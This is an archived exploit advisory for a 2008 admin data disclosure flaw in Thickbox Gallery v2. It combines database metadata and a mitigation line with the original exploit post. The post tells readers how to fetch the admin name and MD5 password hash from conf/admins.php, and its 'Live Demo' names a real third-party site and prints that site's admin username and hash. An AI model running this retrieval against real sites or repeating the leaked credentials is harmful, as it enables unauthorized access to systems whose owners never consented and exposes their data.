Thickbox Gallery v2 Admin Data Disclosure

vendor:

Thickbox Gallery v2

by:

SirGod

7.5

CVSS

HIGH

Arbitrary Admin Data Disclosure

N/A

CWE

Product Name: Thickbox Gallery v2

Affected Version From: Thickbox Gallery v2

Affected Version To: Thickbox Gallery v2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Thickbox Gallery v2 Admin Data Disclosure

An attacker can access the admin data (login name + crypted password as MD5) by accessing the admins.php file located in the conf directory of the Thickbox Gallery v2 application. This can be done by accessing the URL http://localhost/[Path]/conf/admins.php. The attacker can then extract the admin username and the hash from the retrieved data.

Mitigation:

Restrict access to the admins.php file and ensure that the application is up to date with the latest security patches.

Source

Exploit-DB raw data:

#########################################################################################
[+] Thickbox Gallery v2 Admin Data Disclosure
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##########################################################################################

[+] Arbitrary Admin Data Disclosure

    - Go here and you will see the admin data ( login name + crypted password as MD5 )

       http://localhost/[Path]/conf/admins.php

    - Admin data :

          a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}

    - Now extract the admin username and the hash :

        Username : admin

        Password : d73ed8a01f624fcb878296bc7ff302bc

[+] Live Demo

         http://www.davilin.com/tbg/conf/admins.php

    - Retrived :

          a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}

    - Name + Password

        Username : ytakenak
      
        Password : 56bd1d32bcb1fbd2609e4d7634febbd1
   

##########################################################################################

# milw0rm.com [2008-08-26]